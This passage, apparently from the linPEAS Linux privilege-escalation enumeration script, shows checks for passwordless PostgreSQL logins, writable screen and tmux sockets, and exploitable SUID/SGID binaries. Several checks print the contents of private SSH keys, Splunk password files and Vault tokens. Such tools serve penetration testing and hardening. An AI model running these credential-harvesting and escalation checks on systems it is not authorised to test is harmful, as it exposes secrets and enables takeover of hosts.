postgres/NOPASS ........ " 11370 if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," 11371 else echo_no 11372 fi 11373 print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " 11374 if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.*,${SED_RED}," 11375 else echo_no 11376 fi 11377 print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " 11378 if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," 11379 else echo_no 11380 fi 11381 print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " 11382 if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," 11383 else echo_no 11384 fi 11385 echo "" 11386 fi 11387 11388 fi 11389 11390 if check_mitre_filter "T1505.001"; then 11391 if [ "$DEBUG" ] || { [ "$TIMEOUT" ] && [ "$(command -v psql 2>/dev/null || echo -n '')" ]; }; then 11392 print_2title "PostgreSQL event trigger ownership & postgres_fdw hooks" "T1505.001" 11393 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#postgresql-event-triggers" 11394 psql_bin="$(command -v psql 2>/dev/null || echo -n '')" 11395 if [ "$TIMEOUT" ] && [ "$psql_bin" ]; then 11396 psql_evt_output="$($TIMEOUT 5 "$psql_bin" -w -X -q -A -t -d postgres -c "WITH evt AS ( SELECT e.evtname, e.evtenabled, pg_get_userbyid(e.evtowner) AS trig_owner, tr.rolsuper AS trig_owner_super, n.nspname || '.' || p.proname AS function_name, pg_get_userbyid(p.proowner) AS func_owner, fr.rolsuper AS func_owner_super FROM pg_event_trigger e JOIN pg_proc p ON e.evtfoid = p.oid JOIN pg_namespace n ON p.pronamespace = n.oid LEFT JOIN pg_roles tr ON tr.oid = e.evtowner LEFT JOIN pg_roles fr ON fr.oid = p.proowner ) SELECT evtname || '|' || evtenabled || '|' || COALESCE(trig_owner,'?') || '|' || COALESCE(CASE WHEN trig_owner_super THEN 'yes' ELSE 'no' END,'unknown') || '|' || function_name || '|' || COALESCE(func_owner,'?') || '|' || COALESCE(CASE WHEN func_owner_super THEN 'yes' ELSE 'no' END,'unknown') FROM evt WHERE COALESCE(trig_owner_super,false) = false OR COALESCE(func_owner_super,false) = false;" 2>&1)" 11397 psql_evt_status=$? 11398 if [ $psql_evt_status -eq 0 ]; then 11399 if [ "$psql_evt_output" ]; then 11400 echo "Non-superuser-owned event triggers were found (trigger|enabled?|owner|owner_is_super|function|function_owner|fn_owner_is_super):" | sed -${E} "s,.*,${SED_RED}," 11401 printf "%s\n" "$psql_evt_output" | while IFS='|' read evtname enabled owner owner_is_super func func_owner func_owner_is_super; do 11402 case "$enabled" in 11403 O) enabled="enabled" ;; 11404 D) enabled="disabled" ;; 11405 *) enabled="status_$enabled" ;; 11406 esac 11407 echo " - $evtname ($enabled) uses $func owned by $func_owner (superuser:$func_owner_is_super); trigger owner: $owner (superuser:$owner_is_super)" | sed -${E} "s,superuser:no,${SED_RED},g" 11408 done 11409 else 11410 echo "No event triggers owned by non-superusers were returned." | sed -${E} "s,.*,${SED_GREEN}," 11411 fi 11412 else 11413 psql_evt_err_line=$(printf '%s\n' "$psql_evt_output" | head -n1) 11414 echo "Could not query pg_event_trigger (psql exit $psql_evt_status): $psql_evt_err_line" | sed -${E} "s,.*,${SED_YELLOW}," 11415 fi 11416 else 11417 if ! [ "$TIMEOUT" ]; then 11418 echo_not_found "timeout" 11419 fi 11420 if ! [ "$psql_bin" ]; then 11421 echo_not_found "psql" 11422 fi 11423 fi 11424 postgres_fdw_dirs="/etc/postgresql /var/lib/postgresql /var/lib/postgres /usr/lib/postgresql /usr/local/lib/postgresql /opt/supabase /opt/postgres /srv/postgres" 11425 postgres_fdw_hits="" 11426 for d in $postgres_fdw_dirs; do 11427 if [ -d "$d" ]; then 11428 old_ifs="$IFS" 11429 IFS="\n" 11430 for f in $(find "$d" -maxdepth 5 -type f \( -name '*postgres_fdw*.sql' -o -name '*postgres_fdw*.psql' -o -name 'after-create.sql' \) 2>/dev/null); do 11431 if [ -f "$f" ] && grep -qiE "alter[[:space:]]+role[[:space:]]+postgres[[:space:]]+superuser" "$f" 2>/dev/null; then 11432 postgres_fdw_hits="$postgres_fdw_hits\n$f" 11433 fi 11434 done 11435 IFS="$old_ifs" 11436 fi 11437 done 11438 if [ "$postgres_fdw_hits" ]; then 11439 echo "Detected postgres_fdw custom scripts granting postgres SUPERUSER (check for SupaPwn-style window):" | sed -${E} "s,.*,${SED_RED}," 11440 printf "%s\n" "$postgres_fdw_hits" | sed "s,^, - ," 11441 fi 11442 fi 11443 echo "" 11444 11445 fi 11446 11447 if check_mitre_filter "T1613,T1611"; then 11448 if ! [ "$SEARCH_IN_FOLDER" ]; then 11449 runc=$(command -v runc || echo -n '') 11450 if [ "$runc" ] || [ "$DEBUG" ]; then 11451 print_2title "Checking if runc is available" "T1613,T1611" 11452 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#runc--privilege-escalation" 11453 if [ "$runc" ]; then 11454 echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," 11455 fi 11456 echo "" 11457 fi 11458 fi 11459 11460 fi 11461 11462 if check_mitre_filter "T1556"; then 11463 if (grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey) || [ "$DEBUG" ] ; then 11464 print_2title "S/Key authentication" "T1556" 11465 printf "System supports$RED S/Key$NC authentication\n" 11466 if ! [ -d /etc/skey/ ]; then 11467 echo "${GREEN}S/Key authentication enabled, but has not been initialized" 11468 elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then 11469 echo "${RED}/etc/skey/ is writable by you" 11470 ls -ld /etc/skey/ 11471 else 11472 ls -ld /etc/skey/ 2>/dev/null 11473 fi 11474 echo "" 11475 fi 11476 11477 fi 11478 11479 if check_mitre_filter "T1563"; then 11480 if (command -v screen >/dev/null 2>&1 || [ -d "/run/screen" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then 11481 print_2title "Searching screen sessions" "T1563" 11482 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-shell-sessions" 11483 screensess=$(screen -ls 2>/dev/null) 11484 screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null) 11485 screen -v 11486 printf "$screensess\n$screensess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," 11487 find /run/screen -type s -path "/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do 11488 echo "Other user screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," 11489 done 11490 if [ -r "/etc/passwd" ]; then 11491 print_3title "Checking other users screen sessions" "T1563" 11492 cut -d: -f1,7 /etc/passwd 2>/dev/null | grep "sh$" | cut -d: -f1 | grep -v "^$USER$" | while read u; do 11493 uscreen=$(screen -ls "${u}/" 2>/dev/null | grep -v "No Sockets found" | grep -v "^$") 11494 if [ "$uscreen" ]; then 11495 echo "User $u screen sessions:" 11496 printf "%s\n" "$uscreen" | sed -${E} "s,.*,${SED_RED}," 11497 fi 11498 done 11499 fi 11500 echo "" 11501 fi 11502 11503 fi 11504 11505 if check_mitre_filter "T1552.001"; then 11506 SPLUNK_BIN="$(command -v splunk 2>/dev/null || echo -n '')" 11507 if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then 11508 print_2title "Searching uncommon passwd files (splunk)" "T1552.001" 11509 if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi 11510 printf "%s\n" "$PSTORAGE_SPLUNK" | grep -v ".htpasswd" | sort | uniq | while read f; do 11511 if [ -f "$f" ] && ! [ -x "$f" ]; then 11512 echo "passwd file: $f" | sed "s,$f,${SED_RED}," 11513 cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," 11514 fi 11515 done 11516 echo "" 11517 fi 11518 11519 fi 11520 11521 if check_mitre_filter "T1552.004,T1021.004"; then 11522 print_2title "Searching ssl/ssh files" "T1552.004,T1021.004" 11523 if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi 11524 if ! [ "$SEARCH_IN_FOLDER" ]; then 11525 sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" 11526 hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" 11527 hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" 11528 agent_sockets=$(find /run/user /tmp -type s \( -path "/run/user/*/ssh-*/agent.*" -o -name "ssh-agent.sock" -o -path "/tmp/ssh-*" \) 2>/dev/null) 11529 writable_agents=$(find /tmp /etc /home /run/user \ 11530 \( -type s -a \( -name "agent.*" -o -name "ssh-agent.sock" -o -path "*/ssh-*/agent.*" -o -name "*gpg-agent*" \) \ 11531 -a \( \( -user "$USER" \) -o \( -perm -o=w \) -o \( -perm -g=w -a \( $wgroups \) \) \) \) 2>/dev/null) 11532 else 11533 sshconfig="$(ls ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null)" 11534 hostsdenied="$(ls ${ROOT_FOLDER}etc/hosts.denied 2>/dev/null)" 11535 hostsallow="$(ls ${ROOT_FOLDER}etc/hosts.allow 2>/dev/null)" 11536 agent_sockets=$(find "${ROOT_FOLDER}"tmp "${ROOT_FOLDER}"run -type s \( -name "agent.*" -o -name "ssh-agent.sock" \) 2>/dev/null) 11537 writable_agents=$(find "${ROOT_FOLDER}" \ 11538 \( -type s -a \( -name "agent.*" -o -name "ssh-agent.sock" -o -path "*/ssh-*/agent.*" -o -name "*gpg-agent*" \) \ 11539 -a \( \( -user "$USER" \) -o \( -perm -o=w \) -o \( -perm -g=w -a \( $wgroups \) \) \) \) 2>/dev/null) 11540 fi 11541 if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then 11542 print_2title "Analyzing SSH Files (limit 70)" 11543 if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_dsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11544 if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_rsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11545 if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "known_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11546 if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11547 if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,command=.*,${SED_RED},g" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; 11548 if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"\.pub$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pub"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "\.pub$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pub$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "command=.*" | sed -${E} "s,command=.*,${SED_RED},g"; done; echo ""; 11549 fi 11550 11551 grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFile" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," 11552 if ! [ "$SEARCH_IN_FOLDER" ]; then 11553 if [ "$TIMEOUT" ]; then 11554 privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /etc 2>/dev/null) 11555 privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' $HOMESEARCH 2>/dev/null) 11556 privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /root 2>/dev/null) 11557 privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /mnt 2>/dev/null) 11558 else 11559 privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout 11560 privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' $HOME/.ssh 2>/dev/null) 11561 fi 11562 else 11563 # If $SEARCH_IN_FOLDER lets just search for private keys in the whole firmware 11564 privatekeyfilesetc=$(timeout 120 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' "$ROOT_FOLDER" 2>/dev/null) 11565 fi 11566 if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then 11567 echo "" 11568 print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," 11569 if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi 11570 if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi 11571 if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi 11572 if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi 11573 echo "" 11574 fi 11575 if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then 11576 print_3title "Some certificates were found (out limited):" "T1552.004,T1021.004" 11577 printf "$certsb4_grep\n" | head -n 20 11578 printf "$PSTORAGE_CERTSBIN\n" | head -n 20 11579 echo "" 11580 fi 11581 if [ "$PSTORAGE_CERTSCLIENT" ]; then 11582 print_3title "Some client certificates were found:" "T1552.004,T1021.004" 11583 printf "$PSTORAGE_CERTSCLIENT\n" 11584 echo "" 11585 fi 11586 if [ "$PSTORAGE_SSH_AGENTS" ]; then 11587 print_3title "Some SSH Agent files were found:" "T1552.004,T1021.004" 11588 printf "$PSTORAGE_SSH_AGENTS\n" 11589 echo "" 11590 fi 11591 if [ "$agent_sockets" ]; then 11592 print_3title "Potential SSH agent sockets were found:" "T1552.004,T1021.004" 11593 printf "%s\n" "$agent_sockets" | sed -${E} "s,.*,${SED_RED}," 11594 echo "" 11595 fi 11596 if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then 11597 print_3title "Listing SSH Agents" "T1552.004,T1021.004" 11598 ssh-add -l 11599 echo "" 11600 fi 11601 if gpg-connect-agent "keyinfo --list" /bye 2>/dev/null | grep "D - - 1"; then 11602 print_3title "Listing gpg keys cached in gpg-agent" "T1552.004,T1021.004" 11603 gpg-connect-agent "keyinfo --list" /bye 11604 echo "" 11605 fi 11606 if [ "$writable_agents" ]; then 11607 print_3title "Writable ssh and gpg agents" "T1552.004,T1021.004" 11608 printf "%s\n" "$writable_agents" 11609 fi 11610 if [ "$PSTORAGE_SSH_CONFIG" ]; then 11611 print_3title "Some home ssh config file was found" "T1552.004,T1021.004" 11612 printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done 11613 echo "" 11614 fi 11615 if [ "$hostsdenied" ]; then 11616 print_3title "/etc/hosts.denied file found, read the rules:" "T1552.004,T1021.004" 11617 printf "$hostsdenied\n" 11618 cat " ${ROOT_FOLDER}etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," 11619 echo "" 11620 fi 11621 if [ "$hostsallow" ]; then 11622 print_3title "/etc/hosts.allow file found, trying to read the rules:" "T1552.004,T1021.004" 11623 printf "$hostsallow\n" 11624 cat " ${ROOT_FOLDER}etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," 11625 echo "" 11626 fi 11627 if [ "$sshconfig" ]; then 11628 echo "" 11629 echo "Searching inside /etc/ssh/ssh_config for interesting info" 11630 grep -v "^#" ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," 11631 fi 11632 echo "" 11633 11634 fi 11635 11636 if check_mitre_filter "T1563"; then 11637 tmuxdefsess=$(tmux ls 2>/dev/null) 11638 tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) 11639 tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null) 11640 if ([ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then 11641 print_2title "Searching tmux sessions"$N 11642 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-shell-sessions" 11643 tmux -V 11644 printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," 11645 find /tmp -type s -path "/tmp/tmux*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do 11646 echo "Other user tmux socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," 11647 done 11648 echo "" 11649 fi 11650 11651 fi 11652 11653 if check_mitre_filter "T1552.004"; then 11654 if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then 11655 print_2title "Searching Vault-ssh files" "T1552.004" 11656 printf "$PSTORAGE_VAULT_SSH_HELPER\n" 11657 printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done 11658 echo "" 11659 vault secrets list 2>/dev/null 11660 printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null 11661 fi 11662 echo "" 11663 11664 fi 11665 11666 if check_mitre_filter "T1556"; then 11667 if (grep "auth=" /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) || [ "$DEBUG" ]; then 11668 print_2title "YubiKey authentication" "T1556" 11669 printf "System supports$RED YubiKey authentication\n" 11670 if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then 11671 echo "${RED}/var/db/yubikey/ is writable by you" 11672 ls -ld /var/db/yubikey/ 11673 else 11674 ls -ld /var/db/yubikey/ 2>/dev/null 11675 fi 11676 echo "" 11677 fi 11678 11679 fi 11680 11681 fi 11682 11683 fi 11684 echo '' 11685 echo '' 11686 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 11687 11688 if echo $CHECKS | grep -q interesting_perms_files; then 11689 if check_mitre_filter "T1552.001,T1083,T1574.009,T1574.010,T1548.001,T1222,T1068,T1574.006,T1546.004,T1543.002,T1518.001"; then 11690 print_title "Files with Interesting Permissions" 11691 if check_mitre_filter "T1548.001"; then 11692 print_2title "SUID - Check easy privesc, exploits and write perms" "T1548.001" 11693 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid" 11694 if ! [ "$STRINGS" ]; then 11695 echo_not_found "strings" 11696 fi 11697 if ! [ "$STRACE" ]; then 11698 echo_not_found "strace" 11699 fi 11700 suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) 11701 printf "%s\n" "$suids_files" | while read s; do 11702 [ -z "$s" ] && continue 11703 s=$(ls -lahtr "$s") 11704 #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder 11705 if echo "$s" | grep -qE "^total"; then break; fi 11706 sname="$(echo $s | awk '{print $9}')" 11707 if [ "$sname" = "." ] || [ "$sname" = ".." ]; then 11708 true #Don't do nothing 11709 elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then 11710 echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," 11711 elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) 11712 echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," 11713 else 11714 c="a" 11715 for b in $sidB; do 11716 if echo "$sname" | grep -q $(echo $b | cut -d % -f 1); then 11717 echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," 11718 c="" 11719 break; 11720 fi 11721 done; 11722 if [ "$c" ]; then 11723 if echo "$sname" | grep -qE "$sidG1" || echo "$sname" | grep -qE "$sidG2" || echo "$sname" | grep -qE "$sidG3" || echo "$sname" | grep -qE "$sidG4" || echo "$sname" | grep -qE "$sidVB" || echo "$sname" | grep -qE "$sidVB2"; then 11724 echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," 11725 else 11726 echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED}," 11727 printf $ITALIC 11728 if ! [ "$FAST" ]; then 11729 if [ "$STRINGS" ]; then 11730 $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do 11731 sline_first="$(echo "$sline" | cut -d ' ' -f1)" 11732 if echo "$sline_first" | grep -qEv "$cfuncs"; then 11733 if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path 11734 if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable 11735 printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" 11736 fi 11737 elif echo "$sline_first" | grep -q "/" && [ -d "$(dirname "$sline_first")" ] && [ -w "$(dirname "$sline_first")" ]; then #If path does not exist but can be created 11738 printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can create it inside writable dir $RED$(dirname "$sline_first")$NC$ITALIC (strings line: $sline) (https://tinyurl.com/suidpath)\n" 11739 else #If not a path 11740 if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary 11741 printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" 11742 fi 11743 fi 11744 fi 11745 done 11746 fi 11747 if [ "$LDD" ] || [ "$READELF" ]; then 11748 echo "$ITALIC --- Checking for writable dependencies of $sname...$NC" 11749 fi 11750 if [ "$LDD" ]; then 11751 "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" 11752 fi 11753 if [ "$READELF" ]; then 11754 "$READELF" -d "$sname" | grep PATH | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" 11755 fi 11756 if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ -x "$sname" ]; then 11757 printf $ITALIC 11758 echo "----------------------------------------------------------------------------------------" 11759 echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." 11760 OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH 11761 export LD_LIBRARY_PATH="" 11762 timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" 11763 printf $NC 11764 export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH 11765 echo "----------------------------------------------------------------------------------------" 11766 echo "" 11767 fi 11768 fi 11769 fi 11770 fi 11771 fi 11772 done; 11773 echo "" 11774 11775 fi 11776 11777 if check_mitre_filter "T1548.001"; then 11778 print_2title "SGID" "T1548.001" 11779 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid" 11780 sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) 11781 printf "%s\n" "$sgids_files" | while read s; do 11782 [ -z "$s" ] && continue 11783 s=$(ls -lahtr "$s") 11784 #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder 11785 if echo "$s" | grep -qE "^total";then break; fi 11786 sname="$(echo $s | awk '{print $9}')" 11787 if [ "$sname" = "." ] || [ "$sname" = ".." ]; then 11788 true #Don't do nothing 11789 elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then 11790 echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," 11791 elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) 11792 echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," 11793 else 11794 c="a" 11795 for b in $sidB; do 11796 if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then 11797 echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," 11798 c="" 11799 break; 11800 fi 11801 done; 11802 if [ "$c" ]; then 11803 if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then 11804 echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," 11805 else 11806 echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," 11807 printf $ITALIC 11808 if ! [ "$FAST" ]; then 11809 if [ "$STRINGS" ]; then 11810 $STRINGS "$sname" | sort | uniq | while read sline; do 11811 sline_first="$(echo $sline | cut -d ' ' -f1)" 11812 if echo "$sline_first" | grep -qEv "$cfuncs"; then 11813 if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path 11814 if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable 11815 printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" 11816 fi 11817 elif echo "$sline_first" | grep -q "/" && [ -d "$(dirname "$sline_first")" ] && [ -w "$(dirname "$sline_first")" ]; then #If path does not exist but can be created 11818 printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can create it inside writable dir $RED$(dirname "$sline_first")$NC$ITALIC (strings line: $sline)\n" 11819 else #If not a path 11820 if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary 11821 printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" 11822 